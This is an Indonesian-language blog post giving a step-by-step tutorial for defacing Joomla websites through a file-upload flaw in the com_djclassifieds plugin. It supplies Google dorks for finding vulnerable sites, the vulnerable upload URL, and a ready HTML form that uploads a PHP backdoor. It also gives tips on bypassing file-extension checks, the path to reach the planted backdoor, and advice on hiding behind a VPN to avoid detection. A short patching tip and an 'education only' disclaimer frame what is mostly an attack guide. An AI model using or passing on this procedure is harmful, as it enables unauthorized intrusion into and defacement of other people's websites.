Cara Merubah Tampilan Website Dengan Metode com_djclassifieds

June 15, 2019

Hacking, BagasUnix - Hallo... sobat unix, kali ini saya akan menulis artikel tentang bagaimana merubah tampilan website yang terinstall joomla dengan metode com_djclassifieds. Yang kita tau bahwa com_djclassifieds adalah salah satu plugin yang ada di CMS Joomla selain com_user yang pernah saya tulis di artikel sebelumnya juga.yaitu cara deface dengan com_user.

Cara mendeface atau merubah tampilan website dengan metode com_djclassifieds, sebetulnya metodi ini lebih ke upload file backdoor kalian ke target website dengan memanfaatkan function upload pada plugin com_djclassifieds.

Lalu bagaimana cara memperbaikinnya supaya para hacker atau orang jail lainnya tidak bisa masuk? Mungkin ini cara yang biasa dilakukan atau di kasih tau caranya diluar sana, tapi ini pasti sangat penting yaitu update plugin kalian atau jika kalian tidak mau update ubahlah file upload /tmp/djupload ke tempat lain. Dengan cara itu kita bisa menghindari yang namanya website kita ter hack atau di bobol sama orang iseng.

Cara ini dilansir dari DotNaonWeh yaitu menjelaskan bagaimana cara Deface Metode com_djclassifieds File Upload, dengan cara itu kalian bisa jadi hacker dengan mudah hihi...

Bahan-bahannya

- Backdooor
- Dork
- Exploit
- CSRF

Langkah -langkah

  • Pertama-tama kalian haru punya backdoor untuk masuk web target kalian, backdoornya bisa kalian dapatkan disini
  • Selanjutnya jika kalian sudah punya backdoornya, kalian bisa lanjutkan tahap selanjutnya yaitu lakukan dorking, atau mencari katakunci di google untuk mendapatkan website yang vuln atau bisa kita masukin. Contoh dork com_djclassifieds inurl:/com_djclassifieds dan inurl:/components/com_djclassifieds
  • Setelah itu kalian lakukan exploit atau pengecekan pada target apakah target tersebut bisa kita masukin. Ini exploitnya /index.php?option=com_djclassifieds&task=upload&tmpl=component dan jika bisa atau vuln bisa diliat pada gambar dibawah 

  • Jika sesuai tampilan target sobat setelah di explit seperti di atas maka langkah selanjutnya yaitu melakukan upload file menggunakan CSRF. untuk bisa kalian liat dibawah
 <html><body><form method="post" action="https://www.site.lu/index.php?option=com_djclassifieds&task=upload&tmpl=component" enctype="multipart/form-data"><input type="file" name="file"/><input type="hidden" name="name" value="mini.phtml" /><input type="submit" value="submit"/></form></body></html> 
action = "site/target/web"
value = "namafilekalian.phtml"
nama file kalian bisa dikreasikan supaya bisa diterima di sistem, dengan cara bypass ext
  • Jika, CSRFnya sudah kalian seusaikan dengan kebutuhan kalian maka CSRFnya tinggal kalian jalankan dengan cara buka melalui Google Chrome ataupun Mozilla Firefox. Jika sudah kalian tinggal pilih file yang akan kalian upload, tapi inget harus sesuai dengan value yang ada di CSRF kalian tadi.
  • Jika berhasil maka akan seperti gambar dibawah ini.
  • Setelah berhasil kita tinggal akses file backdoor yang kita upload tadi deh. Caranya dengan buka /tmp/djupload/namaValueCSRF.phtml 
Nah mungkin itu cara merubah tampilan website dengan metode com_djclassifieds, sebelum beraksi saya sarankan kalian pake vpn berbayar yah atau vpn gratis disini. Kenapa harus pake VPN? Karna supaya tidak terdetek ip kalian hihi...

Terimakasih kepada DotNaonWeh yang terlah memberikan informasih seputar ini, gunakanlah ini sebagai edukasi saja ya, jangan disalah gunakan. Karna resikonya berat sobat hihi...

Artikel Terkait

Next Article
« Prev Post
Previous Article
Next Post »
Penulisan markup di komentar
  • Untuk menulis huruf bold gunakan <strong></strong> atau <b></b>.
  • Untuk menulis huruf italic gunakan <em></em> atau <i></i>.
  • Untuk menulis huruf underline gunakan <u></u>.
  • Untuk menulis huruf strikethrought gunakan <strike></strike>.
  • Untuk menulis kode HTML gunakan <code></code> atau <pre></pre> atau <pre><code></code></pre>, dan silakan parse kode pada kotak parser di bawah ini.

Disqus
Tambahkan komentar Anda

No comments

Mohon berkomentar yang relavan dan tidak menaruh link hidup yah ^_^